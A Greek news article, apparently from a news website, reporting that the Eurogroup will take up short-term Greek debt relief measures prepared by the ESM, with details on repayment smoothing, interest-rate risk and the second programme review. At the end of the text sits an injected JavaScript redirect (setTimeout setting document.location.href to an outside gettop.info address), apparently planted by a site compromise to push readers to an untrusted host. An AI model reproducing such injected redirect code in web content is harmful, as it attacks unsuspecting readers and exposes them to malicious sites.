Ντάισελμπλουμ: Στο τραπέζι του Eurogroup τα βραχυπρόθεσμα μέτρα για το χρέος

0
4

 

To Eurogroup είναι έτοιμο να τηρήσει τη συμφωνία του Μαΐου του 2015 και να βάλει στο τραπέζι τα βραχυπρόθεσμα μέτρα ελάφρυνσης του χρέους, όπως επιβεβαιώνει έγγραφο του Γερούν Ντάισελμπλουμ για την ατζέντα του Eurogroup/Ecofin στις 7-8 Νοεμβρίου.

Σύμφωνα με το euro2day.gr, όπως σημειώνει, η ολοκλήρωση της πρώτης αξιολόγησης ανοίγει τον δρόμο για την υλοποίηση της εξαγγελθείσας ελάφρυνσης χρέους με βραχυπρόθεσμα μέτρα (αναδιαμόρφωση των λήξεων του ανεξόφλητου υπολοίπου των δανείων του EFSF, περιορισμό του κινδύνου επιτοκίου κ.τλ.) που επεξεργάζεται ο ESM.

Το γεγονός άλλωστε είχε επιβεβαιώσει στα μέσα του μήνα και το μέλος του διοικητικού συμβουλίου του Ταμείου Kalin Anev Janse, που είχε δώσει το σχετικό περίγραμμα: υπάρχουν, όπως είπε, τρία τουλάχιστον στοιχεία: Το πρώτο είναι η εξομάλυνση του προφίλ των αποπληρωμών. Η μέση διάρκεια αποπληρωμής είναι σήμερα τα 28 χρόνια. Μπορούμε να την αυξήσουμε στα 32,5 χρόνια, για να προσαρμόσουμε τις αποπληρωμές και να αποφύγουμε κάποιες μεγάλες αυξήσεις στο προφίλ των αποπληρωμών.

Δεύτερον, εξετάζουμε μέτρα για να μειωθεί ο κίνδυνος από τα επιτόκια. Και τρίτον, είναι η άρση μίας μεγάλης αύξησης των επιτοκίων το 2017, για ένα μικρό μέρος του ελληνικού χρέους» (σ.σ. αφορά πέναλτι επιτοκίου που θα έπρεπε να πληρώσει η Ελλάδα για ομόλογα που είχαν επανεκδοθεί στο πλαίσιο επαναγοράς τίτλων το 2013).

Υπενθυμίζεται παράλληλα ότι την περασμένη Τρίτη το Euro2day.gr είχε αποκαλύψει τις συζητήσεις που διεξάγονται μεταξύ ελληνικών τραπεζών, ΟΔΔΗΧ και ESM για την έκδοση ενός ομολογιακού τίτλου σταθερού επιτοκίου που θα εκδώσει το Ταμείο σε αντικατάσταση ομολόγων κυμαινόμενου επιτοκίου ύψους 25 δισ. ευρώ, που διακρατούν οι ελληνικές τράπεζες.

Στο έγγραφο σημειώνεται ότι η επόμενη αποστολή των θεσμών έχει προγραμματιστεί για το διάστημα 14-21 Νοέμβριου.

Σε ό,τι αφορά στη β’ αξιολόγηση, μιλά για «ευρύ φάσμα μέτρων». Σε αυτά περιλαμβάνει τα μέτρα στον τομέα των μεταρρυθμίσεων της κοινωνικής ασφάλισης (σ.σ. ερώτημα παραμένει αν εννοεί το επίδομα Κοινωνικής Αλληλεγγύης, ή θα κινηθεί στη γραμμή ΔΝΤ που εκτιμά ότι το ασφαλιστικό παραμένει μη βιώσιμο) και της αγοράς εργασίας, που αναμένεται να είναι στο επίκεντρο αυτής της αποστολής.

Μέτρα λαμβάνονται επίσης στον τομέα των ιδιωτικοποιήσεων, του χρηματοπιστωτικού, της ενέργειας, της δημόσιας διοίκησης, της νομοθεσίας σχετικά με τη στρατηγική του προϋπολογισμού για το μεσοπρόθεσμο, το επιχειρηματικό κλίμα και την εκπαίδευση του προϊόντος.

Σημειώνει, τέλος, ότι η κυβέρνηση έχει δεσμευτεί για την ταχεία ολοκλήρωση της δεύτερης αξιολόγησης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here